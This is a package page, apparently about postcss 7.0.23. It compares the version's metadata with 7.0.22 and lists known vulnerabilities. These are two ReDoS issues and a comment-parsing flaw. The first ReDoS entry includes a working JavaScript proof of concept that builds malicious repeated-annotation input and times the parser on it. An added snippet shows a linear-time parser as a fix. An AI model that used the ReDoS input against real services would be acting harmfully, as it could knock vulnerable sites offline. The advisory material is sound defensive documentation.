PostCSS version 7.0.23 is a minor update over its predecessor, 7.0.22, within the 7.x stable branch of this widely adopted CSS transformation tool. Both versions share identical core dependencies: chalk for colored console output, source-map for debugging support, and supports-color to detect terminal color capabilities, so the developer experience is unchanged. The library remains licensed under the permissive MIT license, continues to be actively supported through Tidelift funding, and still credits Andrey Sitnik as the author. The key differences lie in the internal build or packaging process, as reflected in the differences between the two dist objects.
Specifically, version 7.0.23 has a slightly larger unpackedSize than 7.0.22 (600273 bytes vs 600232 bytes) while both versions have the same fileCount, which suggests that only a few bytes were added. This points to minor bug fixes, small refinements, or documentation changes within the package rather than significant feature additions. Version 7.0.23 was released shortly after 7.0.22, and changes of this size are unlikely to introduce breaking API changes. Developers already using 7.0.22 can upgrade to 7.0.23 without major concerns, and new users can install the newer version directly. The upgrade provides the newest bug fixes and keeps developers on the latest stable release for maximum stability.
All vulnerabilities affecting version 7.0.23 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
The proof of concept that accompanies this entry:

var postcss = require("postcss")

// Builds "a{}" followed by n copies of the annotation prefix and no closing "*/"
function build_attack(n) {
  var ret = "a{}"
  for (var i = 0; i < n; i++) {
    ret += "/*# sourceMappingURL="
  }
  return ret + "!";
}

// Parse a well-formed annotation first
postcss.parse('a{}/*# sourceMappingURL=a.css.map */')

// Then time the parser on progressively longer malformed inputs
for (var i = 1; i <= 500000; i++) {
  if (i % 1000 == 0) {
    var time = Date.now();
    var attack_str = build_attack(i)
    try {
      postcss.parse(attack_str)
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    } catch (e) {
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    }
  }
}
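As an added illustration (not PostCSS's own code or its fix), here is a linear-time way to read the last sourceMappingURL annotation. The sub-pattern quoted above ends in "(.*)" inside a regex that can backtrack heavily when the "/*# sourceMappingURL=" prefix is repeated without a closing "*/"; scanning comment by comment with indexOf never re-reads earlier bytes, so the repeated-prefix input costs only one pass. The function and constant names are my own.

```javascript
// Added example, not PostCSS code: extract the last "/*# sourceMappingURL=... */"
// annotation in linear time instead of with a backtracking regex.

const ANNOTATION_KEY = '# sourceMappingURL=';

// Returns the URL from the last well-formed annotation comment, or null if
// there is none. Each byte of css is scanned a bounded number of times:
// indexOf('/*') moves forward from pos, indexOf('*/') moves forward from the
// opener, and pos is advanced past the closer, so repeated prefixes and an
// unterminated comment (the ReDoS input shape above) finish in one pass.
function getLastSourceMapAnnotation(css) {
  let url = null;
  let pos = 0;
  for (;;) {
    const open = css.indexOf('/*', pos);
    if (open === -1) break;
    const close = css.indexOf('*/', open + 2);
    if (close === -1) break; // unterminated comment: nothing more to read
    // Allow whitespace between "/*" and "#", as the original pattern's \s* does
    const body = css.slice(open + 2, close).trimStart();
    if (body.startsWith(ANNOTATION_KEY)) {
      url = body.slice(ANNOTATION_KEY.length).trim();
    }
    pos = close + 2; // never rescan earlier bytes
  }
  return url;
}

// Constructed inputs: a normal annotation and the repeated-prefix shape
console.log(getLastSourceMapAnnotation('a{}/*# sourceMappingURL=a.css.map */'));
console.log(getLastSourceMapAnnotation('a{}' + '/*# sourceMappingURL='.repeat(100000) + '!'));
```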
Regular Expression Denial of Service in postcss
The npm package postcss from 7.0.0 and before versions 7.0.36 and 8.2.10 is vulnerable to Regular Expression Denial of Service (ReDoS) during source map parsing.
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, those parts are included in the PostCSS output as CSS nodes (rules, properties) despite originally being part of a comment.